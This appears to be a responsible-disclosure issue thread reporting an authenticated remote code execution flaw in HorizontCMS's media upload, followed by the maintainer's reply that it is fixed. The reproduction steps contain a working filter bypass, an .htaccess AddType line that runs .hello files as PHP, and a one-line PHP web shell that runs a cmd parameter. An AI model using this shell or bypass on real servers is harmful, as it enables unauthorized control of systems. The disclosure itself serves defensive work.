Authenticated Remote Code Execution via a Media Files Upload (PHP Filetype Bypass)

[bigb0sss]

Description of the Issue

One who is able to log into the admin panel can gain Remote Code Execution via uploading a .htaccess and *.hello files using the Media Files upload functionality. The original file upload vulnerability (CVE-2020-27387) was remediated by restricting the PHP extensions; however, we confirmed that the filter was bypassed via uploading an arbitrary .htaccess and *.hello files in order to execute PHP code to gain RCE.

Reproduction of the Issue

1. Login to the admin panel (http:///admin/login)
2. Go to "Media" --> "Files"
3. Upload the following file --> Rename the file name as ".htaccess"

AddType application/x-httpd-php .hello

4. Upload another following file --> Rename the file name as "test.hello"

<?php system($_GET['cmd']); ?>

5. Go to http://<HorizontCMS IP/storage/test.hello?cmd= for RCE

Screenshots

• Upload files and rename them:
  

• Gain RCE
  

Root Cause

• Allowing an arbitrary file & rename functionality is not properly sanitizing the file extension.

Recommendations

• Re-work on file upload function where they should always check for MIME-Type and file extension
• Avoid leaving the file upload folder ("/storage") open

Please let us know if you have any questions or need further information. Thanks!

Daniel Min & Chi Tran

[ttimot24]

Hi @bigb0sss,

This issue is addressed on the latest commit on master. The next release (1.0.0-beta.3) will contain this fix. Please mention this in your blogpost also.

Thank you!

[bigb0sss]

HI @ttimot24,

Thanks for addressing the issue! We will update our blog post as well.

Thank you!